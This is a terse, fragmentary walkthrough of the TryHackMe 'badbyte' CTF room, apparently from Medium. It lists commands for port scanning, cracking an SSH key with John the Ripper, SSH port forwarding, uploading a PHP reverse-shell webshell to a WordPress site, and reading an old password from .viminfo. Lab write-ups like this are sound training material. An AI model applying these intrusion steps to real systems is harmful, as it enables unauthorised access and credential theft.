TryHackMe | badbyte by electronforce

Task 1 | Deploy the machine

Task 2 | Reconnaissance

Q1: How many ports are open?

 nmap -p- -vv -oA

Task 3 | Foothold

ftp to host
python /opt/john/ id_rsa > id_rsa.hashjohn id_rsa.hash -w=$(locate rockyou.txt)
john the ripper
root:~# chmod 600 id_rsa

Task 4 | Port Forwarding

Q7: What main TCP ports are listening on localhost?

ssh -ND 9050 -i id_rsa  username@$ip
ssh dynamic port forward

Task 5 | Web Exploitation

Q9: What CMS is running on the machine?

ssh local port forward
nmap http-wordpress-enum
cp /usr/share/webshells/php/php-reverse-shell.php /tmp/s.php
download exploit
manually used script by
Catching the shell
boom user.txt

Task 6 | Privilege Escalation

Q16:What is the user’s old password?

.viminfo in home directory
.viminfo contents
w00t root.txt



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store